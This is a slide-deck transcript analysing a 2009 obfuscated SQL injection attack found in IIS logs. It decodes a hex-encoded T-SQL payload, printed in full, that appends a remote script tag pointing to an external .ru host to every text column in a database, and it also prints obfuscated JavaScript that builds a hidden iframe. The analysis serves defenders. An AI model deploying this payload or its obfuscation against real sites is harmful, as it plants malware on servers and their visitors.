1. SQL Injection Attack Overview

2. Step by step analysis of a SQL Injection attack Code Obfuscation a Definition IIS Log Entry Decoding the HEX Part 1 SQL Injection Code Decoding the HEX Part 2 Injected Code Where is this coming from?

3. Code Obfuscation a Definition “Obfuscated code is source or machine code that has been made difficult to understand. Programmers may deliberately obfuscate code to conceal its purpose (a form of security through obscurity), to deter reverse engineering, or as a puzzle or recreational challenge for readers. Programs known as obfuscators transform human-readable code into obfuscated code using various techniques.” -Wikipedia

4. IIS Log Entry \\web101\Logs$\IIS\W3SVC1\u_ex090926.log:2009-09-26 16:41:23 W3SVC1 WEB101 1.1.1.1 GET /client/file.asp adid=24&category=Texas+03- 04%2F08;DECLARE%20@s%20VaRcHAr(4000);SET%20@S=casT(0x4445436C41724520405420 5641524348617228323535292C406320566152436861522832353529206445636C4172652074614 24C655F637552736F5220435552536F5220664F722053456C45437420412E6E616D652C622E6E6 16D652046726F4D207379736F626A4543747320612C735973434F6C554D6E73206220776865726 520412E49643D622E696420614E6420412E58547950453D27752720614E442028622E587479506 53D3939206F5220622E58547970453D3335206F7220422E58747950653D323331204F7220422E5 8745970453D31363729204F70456E207441426C455F435552734F72204645746348204E65787420 46726F6D207441624C655F435572734F5220494E546F2040542C4063207768696C452840404645 5463685F5354417455533D302920426567696E20457845632827557064615465205B272B40542B 275D20534574205B272B40432B275D3D525452694D28434F6E5665727428564172434841522834 303030292C5B272B40432B275D29292B4341535428305833433733363337323639373037343230 3733373236333344363837343734373033413246324637373737373732453632363136453645363 5373237343245373237353246363136343733324536413733334533433246373336333732363937 3037343345206173207641524348417228353129292729204665746348204E6558742046524F4D2 05441624C455F635572736F7220694E744F2040742C404320456E4420436C4F7365205441624C45 5F437572736F72206445414C6C4F63415445205441424C655F435552736F5220%20aS%20varcH Ar(4000));exEc(@S);-- 80 - 123.204.243.229 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.domain.com 200 0 0 13542 1641 1015 This is the IIS log that is generated during the attack. In the next slide we remove the URL encoding and make the information highlighted in yellow more readable.

5. IIS Log Entry - Removing URL Encoding /client/file.asp adid=24&category=Texas 03-04/08; DECLARE @s VaRcHAr(4000); SET @S=casT( 0x4445436C417245204054205641524348617228323535292C40632056615243686152283235352 9206445636C417265207461424C655F637552736F5220435552536F5220664F722053456C454374 20412E6E616D652C622E6E616D652046726F4D207379736F626A4543747320612C735973434F6C 554D6E73206220776865726520412E49643D622E696420614E6420412E58547950453D27752720 614E442028622E58747950653D3939206F5220622E58547970453D3335206F7220422E58747950 653D323331204F7220422E58745970453D31363729204F70456E207441426C455F435552734F72 204645746348204E6578742046726F6D207441624C655F435572734F5220494E546F2040542C406 3207768696C4528404046455463685F5354417455533D302920426567696E204578456328275570 64615465205B272B40542B275D20534574205B272B40432B275D3D525452694D28434F6E56657 27428564172434841522834303030292C5B272B40432B275D29292B43415354283058334337333 6333732363937303734323037333732363333443638373437343730334132463246373737373737 3245363236313645364536353732373432453732373532463631363437333245364137333345334 3324637333633373236393730373433452061732076415243484172283531292927292046657463 48204E6558742046524F4D205441624C455F635572736F7220694E744F2040742C404320456E442 0436C4F7365205441624C455F437572736F72206445414C6C4F63415445205441424C655F435552 736F5220 aS varcHAr(4000)); exEc(@S); CAST: Translates the HEX expression into a character string EXEC: Executes this string After removing the URL encoding and adding some line feeds we have the following code. The cast statement converts the log HEX string into a Variable Character Field (varchar). Next the EXEC command executes this decoded string.

6. Decoding the HEX part 1 0x4445436C41724520405420564152434861 … 0x44 = 68 = D 0x45 = 69 = E 0x43 = 67 = C 0x6C = 108 = l 0x41 = 65 = A 0x72 = 114 = r 0x45 = 69 = E 0x20 = 32 = 0x40 = 64 = @ 0x54 = 84 = T 0x20 = 32 = 0x56 = 86 = V 0x41 = 65 = A 0x52 = 82 = R 0x43 = 67 = C 0x48 = 72 = H 0x61 = 97 = a DEClArE @T VARCHar(255),@c VaRChaR(255) dEclAre taBLe_cuRsoR CURSoR fOr SElECt A.name,b.name FroM sysobjECts a, sYsCOlUMns b where A.Id=b.id aNd A.XTyPE='u' aND (b.XtyPe=99 oR b.XTypE=35 or B.XtyPe=231 Or B.XtYpE=167) OpEn tABlE_CURsOr FEtcH Next From tAbLe_CUrsOR INTo @T,@c whilE(@@FETch_STAtUS=0) Begin ExEc('UpdaTe ['+@T+'] SEt ['+@C+']= RTRiM(COnVert(VArCHAR(4000),['+@C+']))+ CAST(0X3C736372697074207372633D687474703A2F2F7777772E6 2616E6E6572742E72752F6164732E6A733E3C2F7363726970743E as vARCHAr(51))') FetcH NeXt FROM TAbLE_cUrsor iNtO @t,@C EnD ClOse TAbLE_Cursor dEALlOcATE TABLe_CURsoR sysobjects: Contains one row for each object (constraint, default, log, rule, stored procedure, and so on) created within a database. syscolumns: Contains one row for every column in every table and view, and a row for each parameter in a stored procedure. This table is in each database. XType: U = User table 35 = text 99 = ntext 167 = varchar 231 = nvarchar Here we decode the HEX into its ASCII equivalent. Once we apply it to the entire string we have the full code. I’d like to point out that this code is somewhat dynamic in nature. You can see a variety of upper and lower case characters in the code. This causes the encoded HEX to vary significantly from attack to attack and is an attempt to avoid detection. The query in the begining of the code uses an interesting trick by using sysobject and syscolumns, special tables within SQL Server. The query selects all User defined tables and then limits it to columns with datatypes that can hold a string of characters. It then loops through all of these columns and appends a string to each row. This string is also encoded in HEX. We will look at this further in the next slide.

7. Decoding the HEX part 2 0x3C736372697074207372633D687474703A2F2F7777772E626 16E6E6572742E72752F6164732E6A733E3C2F7363726970743E Using the same method as before we very easily determine that the injected string is a script tag pointing to ads.js. I have also experienced changes to this URL from attack to attack. I have decoded about four different locations for ads.js as of this writing.

8. Injected Code – Java Script document['wri5te'.replace(/[0-9]/,'')](RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq')); write(RfCEPXiV('imLQjGIUbV')+hesXRonvzA('yJodBRbANq')); Since most of the code within ads.js is not utilized I’ll stick with what is. The first part is an interesting way of hiding the write command. They utilize the replace function to remove the 5 from within the string literal concealing it from detection. The two functions within the write statement are very similar so I will only explain one of them but I will indicate where their differences are.

9. Injected Code – Java Script function RfCEPXiV(KDZJF){ var Ffwx=6, TMplSKEfAW=4; var VhoWIRnEH='90+0,157+2,153+0,171+0,145+2,163+2,151+2,48+0,178+2,157+2, 150+0,174+0,156+0,91+2,73+2,48+0,156+0,151+2,157+2,154+2,156+0,174+0,91+2, 73+2,48+0,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,153+0,171+0, 145+2,163+2,151+2,147+0,166+2,171+0,150+0,151+2,171+0,91+2,72+0,48+0,172+2, 171+0,', QlnGAowZ=VhoWIRnEH.split(','); gHuP=''; for(THLfo=0;THLfo<QlnGAowZ.length-1;THLfo++) { MhbtCwq=QlnGAowZ[THLfo].split('+'); gAJys = parseInt(MhbtCwq[0]*TMplSKEfAW)+parseInt(MhbtCwq[1]); gAJys = parseInt(gAJys)/Ffwx; gHuP += String.fromCharCode(gAJys); } return gHuP;} Splits the string at the commas Splits the string at the plus 90*4 + 0 = 360 157*4 + 2 = 630 153*4 + 0 = 612 171*4 + 0 = 684 145*4 + 2 = 582 … 360/6 = 60 630/6 = 105 612/6 = 102 684/6 = 114 582/6 = 97 … 60 = < 105 = i 102 = f 114 = r 97 = a … <iframe width=1 height=1 border=0 frameborder=0 s The first part of this function sets up some variables. These variables are the only differences between the two functions. The first two are a decryption key and the last is the cipher text. The next step is for the code to set up an array based on the cipher text split on the commas. For example the first array element would be 90+0. Next it loops through each of these elements and splits it once again however on the plus sign. It then performs the decryption mathematics and determines the resultant string.

10. Injected Code – php & css Index.php simulates an ‘Error 404 - Page Not Found’ however it has custom Java Script as well as a cascading style sheet which specifies background images. One of three conditions exist. This site has been identified as malicious and has been removed from the hosting provider The images specified in the CSS could be malicious in nature. They have not activated the malicious code and could do so at anytime. The results form both functions result in an iframe which loads index.php. At this point I stopped my investigation partly because the index.php file returned a Page Not Found error. As noted bellow there are three possible conditions at this point.

11. Where is this coming from? 123.204.243.229 inetnum: 123.204.0.0 - 123.205.255.255 netname: SEEDNET-NET descr: Digital United Inc. descr: 7F,220,gangchi road descr: Taipei Taiwan 114 country: TW admin-c: MC37-AP tech-c: MC37-AP status: ALLOCATED PORTABLE notify: michaelc@du.net.tw mnt-by: MAINT-TW-TWNIC mnt-lower: MAINT-TW-TWNIC mnt-routes: MAINT-TW-TWNIC remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+ remarks: This object can only be updated by APNIC hostmasters. remarks: To update this object, please contact APNIC remarks: hostmasters and include your organisation's account remarks: name in the subject line. remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+ changed: hm-changed@apnic.net 20061228 source: APNIC By performing a WhoIs on the source address identified in the IIS logs we can determine that this particular attack originated from Taiwan. IP addresses for other attacks varied in origin however so far all have originated from Asia. After some communications with the Internet Storm Center I was provided with a link to a diary entry for April 16, 2008 (click here to see it). The handlers at the ISC actually have the code (apparently written in Chinese) that utilizes Google to identify sites that are vulnerable to this attack. The program performs a Google search for a string that would indicate a vulnerable site and then executes the attack against them.

12. SQL Injection Attack Overview Thank you for watching Fred Stuck